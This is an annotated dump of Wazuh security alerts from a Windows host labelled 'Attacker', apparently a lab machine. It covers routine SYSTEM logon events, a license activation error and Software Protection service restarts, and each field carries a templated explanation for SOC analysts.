data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  ERROR
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "License Activation (slui.exe) failed with the following error code: hr=0x80004005 Command-line arguments: RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=NetworkAvailable"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.data:  hr=0x80004005, RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=NetworkAvailable
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:25.153+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:25.153+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533885.97820
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:37:40.9838207Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43462
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  888
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Software protection service scheduled successfully.

🧠 What happened? Software protection service scheduled successfully.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:25.367+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:25.367+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Software protection service scheduled successfully.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60642
Numeric ID of the detection rule that fired.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533885.105153
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Software Protection Platform Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  16384
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:41:26.3848083Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2367
Incremental log record number – handy for timeline order.

data.win.system.processID:  1172
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Successfully scheduled Software Protection service for re-start at 2025-04-21T01:40:26Z. Reason: RulesEngine."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.data:  2025-04-21T01:40:26Z, RulesEngine
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Software protection service scheduled successfully.

🧠 What happened? Software protection service scheduled successfully.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:26.589+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:26.589+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Software protection service scheduled successfully.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60642
Numeric ID of the detection rule that fired.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533886.106732
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Software Protection Platform Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  16384
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:47:15.5376499Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2371
Incremental log record number – handy for timeline order.

data.win.system.processID:  1948
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Successfully scheduled Software Protection service for re-start at 2025-04-21T01:40:15Z. Reason: RulesEngine."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.data:  2025-04-21T01:40:15Z, RulesEngine
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:26.694+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:26.694+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533886.108311
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:38:27.9148683Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43468
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  888
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Software protection service scheduled successfully.

🧠 What happened? Software protection service scheduled successfully.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:27.006+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:27.006+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Software protection service scheduled successfully.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60642
Numeric ID of the detection rule that fired.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533887.115645
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Software Protection Platform Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  16384
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:47:48.6215646Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2373
Incremental log record number – handy for timeline order.

data.win.system.processID:  2116
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Successfully scheduled Software Protection service for re-start at 2025-04-21T01:40:48Z. Reason: RulesEngine."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.data:  2025-04-21T01:40:48Z, RulesEngine
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Software protection service scheduled successfully.

🧠 What happened? Software protection service scheduled successfully.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:27.646+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:27.646+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Software protection service scheduled successfully.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60642
Numeric ID of the detection rule that fired.

rule.firedtimes:  7
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533887.117224
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Software Protection Platform Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  16384
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

